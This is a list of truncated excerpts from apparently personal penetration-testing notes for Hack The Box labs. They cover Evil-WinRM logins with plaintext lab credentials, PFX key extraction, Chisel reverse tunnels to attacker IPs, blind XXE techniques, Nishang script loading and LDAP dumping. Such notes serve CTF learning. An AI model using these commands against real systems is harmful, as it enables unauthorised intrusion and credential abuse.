Host entries 10.10.11.152 dc01.timelapse.htb timelapse.htb If Active Directory => NTP Synchronization with the domain controller. Content Kerberos enumeration RPC Enumeration SMB En...

Basic Access Evil-WinRM to access via port tcp-5985 into a system: evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_dem_girls2@yahoo.com' Examples: [[Forest#^b22389]] Active Directory Certificate S...

Calling an operating system API from PowerShell is not completely straightforward. Fortunately, other researchers have presented a technique that simplifies the process and also helps avoid endpoin...

Login via PFX File: First we need to extract the key and the certificate from the pfx file: # Extracting the public certificate: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out public...

Download Chisel Remote port forwarding Chisel as client: # Single Port .\\chisel.exe client 10.10.16.4:1337 R:1433:localhost:1433 # All the ports ./chisel client 10.10.14.3:1234 R:127.0.0.1:socks ...

Detection You can often detect blind XXE using the same technique as for XXE SSRF attacks but triggering the out-of-band network interaction to a system that you control. For example, you would def...

Headers: To exploit an XXE Content-Type must be text/xml POST /action HTTP/1.0 Content-Type: text/xml File Reading While exploring an XXE it is important to use the tags provided by the appl...

Nishang If we want to add a .ps1 file into a Windows machine such as the Nishang series we can modify the latest line of such file (to load the script and then execute it): Write-Warning "S...

Basic Enumeration ntpq -c readlist <IP_ADDRESS> ntpq -c readvar <IP_ADDRESS> ntpq -c peers <IP_ADDRESS> ntpq -c associations <IP_ADDRESS> ntpdc -c monlist <IP_ADDRESS>...

LDAPDOMAINDUMP Dumping useful information from the domain controller via LDAP: ldapdomaindump -u 'htb.local\amanda' -p 'Ashare1972' 10.10.10.103 [*] Connecting to host... [*] Binding to host [+] Bi...